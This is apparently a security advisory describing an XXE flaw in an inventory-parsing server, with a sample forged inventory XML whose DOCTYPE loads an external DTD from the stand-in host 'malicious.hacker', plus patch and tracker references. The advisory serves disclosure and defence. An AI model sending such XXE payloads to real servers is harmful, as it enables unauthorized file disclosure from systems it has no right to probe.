XXE through inventory file facilitates file disclosure

Impact

A forged inventory can lead to requesting a malicious external entity when parsing inventory:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://malicious.hacker/xxe.dtd"> %xxe;]>
<REQUEST>
  <CONTENT>
    <ACCESSLOG>
      <LOGDATE>2024-07-10 13:46:35</LOGDATE>
    </ACCESSLOG>
    [...]
  </CONTENT>
  <DEVICEID>agent-linux-2024-07-02-16-10-52</DEVICEID>
  <QUERY>INVENTORY</QUERY>
</REQUEST>

Patches

#5772

Workarounds

None.

References

#25157 on the bug tracker

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

XXE through inventory file facilitates file disclosure

Package

Affected versions

Patched versions

Description

Impact

Patches

Workarounds

References

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

CVE ID

Weaknesses